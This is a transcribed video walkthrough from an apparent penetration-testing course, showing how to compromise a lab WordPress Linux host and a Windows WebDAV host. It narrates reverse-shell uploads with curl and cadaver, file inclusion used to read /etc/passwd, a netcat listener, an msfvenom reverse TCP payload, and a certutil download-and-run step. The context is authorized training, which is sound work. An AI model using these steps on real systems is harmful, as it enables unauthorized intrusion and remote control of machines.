Web Application Lab Walkthrough

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
Welcome to the Web application lab walkthrough.
00:07
So we have two hosts here. One is a bit NAMI Wordpress stack, which is a Lennox host
00:14
and the other is a Windows host.
00:16
And like I told you before you need to go to WP scan dot com and get an api token
00:23
to scan this bit NAMI Wordpress site. Of course you can you can use end map to scan these. But since this is a web attack lab, you can be pretty sure it's either import 80 or 443
00:36
So we go to this site we notice it's in the Wordpress directory. That becomes important when we use WP scan so we can see if the bat it's a Wordpress site.
00:47
So what I'll do is I'll use WP scan.
00:52
You are L HDP
00:55
On 92168
00:58
1-50 Wordpress. Make sure you specify that directory,
01:03
otherwise it's not gonna work.
01:06
Then you can do
01:07
api token equals
01:11
and put your api token
01:14
and start your skin.
01:15
Now you're gonna get a lot of information back and sometimes it's not that you have too little information
01:21
is that you have too much information that comes back.
01:25
You'll see the themes come back with a lot of information.
01:29
So you'll see that config backup is identified here. If you actually go to this site,
01:34
you might not see anything but you paid source. Here's a whole bunch of good information that you can see about the configuration of this. Wordpress site.
01:45
But is that going to get us a shell? Probably not.
01:48
So let me start looking at the vulnerabilities were identified and I actually made this box so hopefully you like it and sometimes it's not. Again, it's not too little information is too much information so you have to kind of pick
02:02
out of these three vulnerabilities, unauthenticated file inclusion
02:07
and authenticates sequel, injection
02:08
and this upload arbitrary code execution or arbitrary file upload Which one is most important. And this is where your hackers senses have to kick in.
02:17
So out of all these vulnerabilities, what was most interesting to me is an arbitrary file. Upload
02:23
the sequel injection. If you look at the pOC,
02:29
it will give you a sequel map
02:31
pOC here.
02:32
I kind of threw that in. There is a trick. I mean you can use this if you want but of course in Os CPU can't use this. And the other thing is I said the people that write this might not give you a lot of information. This will drop you in a sequel shell. So it will just be sitting there staring at you and if you don't know how to write sequel statements, you won't know what to do.
02:52
So understand what all this means. This is a lot of information to give you,
02:57
uh, in this exploitation example.
03:00
So if you want to use this, go ahead and research it.
03:02
Also. This unauthenticated file inclusion.
03:08
This is interesting.
03:13
And we can read the etc. Password file.
03:21
Let's go ahead and pace that.
03:25
So we can read the etc password file. We could read a bunch of files.
03:30
But again, my goal is to get a shell on this box.
03:34
So if I go back and look,
03:37
I did this on purpose here.
03:38
So if you look at the arbitrary file upload is actually to an exploit. DB1 is a medicine plate module. That's fun.
03:49
And the other,
03:52
the other should be PHP A script in PHP. There's two PHP scripts, there's this one
03:58
and this one. And that's why I go back to being able to read these examples.
04:02
So this is we have to ask yourself, am I going to waste a medicine plate module? If you actually look at the code
04:09
is making a crow request,
04:12
you could do this from the command line and I will show you how easy this is. You don't even need to use the PHP.
04:17
So what I can do here
04:21
is I will open up another shell.
04:28
I'm gonna copy
04:30
user
04:31
share
04:34
web shell.
04:36
PHP
04:38
PHP reverse shell here.
04:42
And I'm going to rename it
04:47
to shell just to make it easy.
04:50
And of course this is the pen test monkey shell. So I have to have to edit some things.
04:58
So I'm going to edit
05:02
the ip
05:05
192,168,150.
05:11
I can leave that port.
05:15
And how do I curl this? Well if I look at the poc
05:19
it tells me curl I in it
05:24
where I need to curl it to
05:28
so I can do curl
05:30
attack big F
05:32
file
05:34
data
05:36
equals.
05:39
Mm
05:40
Shell dot
05:43
PHP
05:46
http
05:48
1921681-50
05:53
wordpress.
05:55
And then I need
05:58
this here.
06:05
Then I hope I spelled everything right.
06:10
Single quote for this.
06:19
I don't think like that.
06:33
Uh my wordpress twice.
06:41
Okay.
06:42
So it tells us where our file should be. Of course what we need to do now is set up a listener
06:47
On Port 1234
06:50
and go to that site that it gave us. Of course. I might just cut off my shell right there.
06:59
And that cat
07:00
and L. E. P 1234
07:04
And let's go here.
07:12
Yes. I cut off the shell.
07:20
The joys of
07:23
moving your shell around.
07:25
Uh huh.
07:29
And now we can see I'm a demon and I know it's kind of smushed but the screen is small and I apologize for the labs
07:36
but we can see that
07:40
I am on this box now. 19216812 50. So I've successfully now got gotten on the Lennox box. So that's the way I would get onto it. You don't need to use a medicine flight module. All you need is WP scan and figure out from all that information. Overload
07:57
what the vital information is. So that's just being able to look at these proof of concepts
08:03
and figuring out from here do I need to do wordpress? You could use wordpress and do this but you just wasted a module and I wouldn't do that when all you need to do is a simple, simple curl request which you can understand by looking at the PHP here. If you don't understand it. You know, just take a look and google all this and figure out
08:22
that's how I that's how I figured it out was googling
08:24
and I and basically came down to a curl request so that's how easy it is
08:31
for that and I made it that way on purpose
08:33
so now that we have a shell
08:37
on the Lennox box, I will close this out. So we've successfully completed one task.
08:45
So now let's move over to the windows box.
08:52
So I like to do robots dot txt
08:56
and see what I can find.
08:58
And I see there's a web Dav directory
09:03
now if I go here, if I'm thinking web dav
09:07
I'm thinking I can maybe use cadaver to get onto this. Now the problem is if I use cadaver to put files
09:13
onto this
09:16
ACP 1921681 100
09:22
web dive. It's gonna ask me for a user name and password. I don't know what that is.
09:28
So if I quit and I clear this I can use Derby, http
09:35
1921681 100.
09:39
Web Daph.
09:41
Now you can specify extensions I can duty txt
09:46
or sp or anything but let's do txt and see what we get
10:01
dot txt. Maybe.
10:11
All right. So we found web dav dot txt.
10:16
This gives us the username and password that we want.
10:22
So now what we can do
10:28
as we can try to get a shell on here.
10:30
Now we can try to figure out the technology is is that doesn't use tick does it use
10:37
PHP? Does it use
10:39
ESP I can use what? Web
10:43
1921-681
10:48
100.
10:52
Of course I like to use Apple Isar but we don't have that in the lab.
10:56
So I see it as PHP and PERL.
11:00
So if I have PHP on here,
11:01
I could probably upload that same web shell from Pandas monkey
11:07
onto this box with cadaver.
11:11
So let's go back and use cadaver
11:13
and now we know our credentials, right, user name
11:18
wamp password, Zampa,
11:22
wamp,
11:24
zam. Pop
11:26
awesome.
11:28
So we see index and web dav dot txt Of course that was the file that gave us the information. What we can do now is put
11:35
shell dot PHP on here.
11:37
Unless that
11:39
and of course we can do now
11:43
is like before when split the terminal vertically
11:46
and
11:48
net cat.
11:52
So now that we have a shell on here, I should be able to go to the shell dot PHP
12:01
and I see that there's an error here.
12:03
So why is this? That's a great question to ask yourself. If you read the code. This shell is for
12:11
Lennox, not for Windows.
12:16
So what I could do is put
12:18
user
12:20
share web shells PHP
12:24
simple backdoor.
12:26
So this is an interesting one.
12:41
Simple
12:43
back door that PHP
12:52
So we'll say usage now if I can etc. Password. Is that going to work? No. Why? Because this is a Windows box.
13:01
So a agnostic command that works on both is who am I? And I can see that I am anti authority system.
13:07
Is this enough for a web show?
13:09
Mm hmm. We can do better. Right.
13:15
So what I can do
13:18
is I can do an MSF venom payload.
13:22
I'll do Windows shell,
13:26
reverse
13:28
TCP
13:30
make R L host us.
13:35
El port
13:37
444
13:39
format is E x E
13:43
shell dot e X E.
14:05
Okay,
14:07
so what I can do now
14:11
is we can we can pearl this
14:15
quit
14:16
python three
14:20
http
14:22
server.
14:30
Mm
14:31
Okay, so it's very important. 8000. So what am I trying to do here? I'm trying to get this
14:37
E X C file
14:39
and execute it so that I can get a shell
14:43
on this box.
14:46
Somebody use cert util
14:50
sirte
14:52
you too.
14:56
You are
14:58
your l cash
15:01
Split. I'm doing this from my off my top of my head. So hopefully this is right. 192168
15:07
158,000.
15:13
Shell dot E X C
15:16
output. Shell dot E X C
15:24
like that.
15:26
Mhm.
15:46
All right.
15:46
This is where I google.
15:50
Yeah.
15:58
So you're L cash F
16:11
I don't need output
16:15
and I can see that it got here.
16:23
Great.
16:26
So let's run directory and see if it's there.
16:30
We see it's there.
16:32
So now we need to set up MSF console.
16:41
Actually I don't need to set up MSF console because
16:45
well you can if you want. Right,
16:48
But my shell
16:51
is shell reverse TCP.
16:53
So I could use Net Cat or I could use
16:56
matter split.
17:03
So now if I go
17:07
and shelled
17:11
E x C,
17:14
what I should see now is I am on web Dav here. I am
17:18
to see um system so that's great
17:23
And I see we are on 192168 100.
17:29
I can collapse this terminal here.
17:30
Sub terminal,
17:34
so there you go. So now I'm on the Windows box. So that's how you get a shell
17:40
on both boxes
17:44
and that's just basically from website enumeration
17:48
and knowing what tools you have. I don't think I mentioned cadaver at all in that web exploitation section.
17:55
So it's trying to think outside the box if you c webb dad, what should I do? And I believe that's covered the P W K material. So I kind of wanted to throw a few curveballs in there for you so you could try harder and also try smarter. So hopefully you got shells on both boxes and this walkthrough shows you how you can do that.
Up Next
Offensive Penetration Testing

The Offensive Penetration Testing course opens the doors to those wanting to begin a penetration testing career. This course will prepare learners to begin their pentesting career journey by understanding what tools, techniques, and resources are available for someone starting out in offensive penetration testing.

Instructed By